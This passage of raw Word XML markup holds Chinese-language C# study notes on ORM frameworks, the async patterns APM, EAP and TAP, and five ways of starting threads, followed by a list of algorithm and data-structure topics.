        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SqlBulkCopyOptions Enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ORM框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>EF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/StackExchange/Dapper" \t "http://www.cnblogs.com/1996V/p/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dapper：最常见的轻量级ORM框架（开源）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nhibernate：最常见的重量级ORM框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="90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异步和多线程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TPL异步</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用异步编程，方法调用时在后台运行，并且不会阻塞调用线程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异步编程模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Async Patterns Model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(APM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异步模式定义了BeginXXX和EndXXX方法。BeginXXX方法接受其同步方法的所有输入参数，EndXXX方法使用同步方法的所有输出参数，并按照同步方法的返回类型来返回结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于事件的异步模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Event-based Async Pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(EAP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于事件的异步模式定义了一个带有“Async”后缀的方法。例如，对于同步方法DownloadString，WebClient提供了异步方法DownloadStringAsync。并且你需要编写DownloadStringCompleted事件，这个事件会在异步方法完成后调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于事件的异步方法优势在于易于使用。但是，在自定义类中这个模式就没有这么简单了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于任务的异步模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task-based Async Pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(TAP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该模式定义一个带有“Async”后缀的方法，并返回一个Task类型。例如WebClient提供的基于任务的异步方法DownloadStringTaskAsync，该方法返回一个Task&lt;string&gt;，可以用string类接收它，并使用await关键字，await关键字会解除线程(UI线程)的阻塞，完成其他任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>async和await关键字只是编译器的功能。编译器会用Task类创建代码。如果不使用者两个关键字，也可以用C# 4.0和Task类的方法来实现同样的功能，只是没有那么方便。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>async修饰符只能用于返回.NET类型的Task或void方法，以及Window运行库的IAsyncOperation。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Task类的ContinueWith方法定义了任务完成后就调用的代码。指派给ContinueWith方法的委托接收已完成的任务作为参数传入，使用Result属性可以访问任务返回的结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Task类定义了WhenAll和WhenAny组合器。从WhenAll方法返回的Task，是在所有传入方法的任务都完成了才会返回Task。从WhenAny方法返回的Task，是在其中一个传入方法完成了就会返回Task。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C#五种调用多线程的方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Thread 调用线程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thread thread = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thread(Run1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thread thread2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thread(Run2);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>thread.Start();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>thread2.Start();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ThreadPool 调用线程池</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ThreadPool.QueueUserWorkItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(m =&gt; {Run1();});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ThreadPool.QueueUserWorkItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(m =&gt; {Run2();});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Task 调用线程或线程池，比前两个优化了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task t = new Task(Run1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task t2 = new Task(Run2);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t.Start();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t2.Start();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Task.Factory 调用任务工厂</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Task.Factory.StartNew(Run1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Task.Factory.StartNew(Run2);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Parallel.Invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并行任务，这里是先执行Run1和Run2()再执行主线程，和之前四种不一样</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>Parallel.Invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Run1,Run2);</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数据结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>百鸡算法，贪婪思想，递归</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>线性表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>二叉树</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>栈与队列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
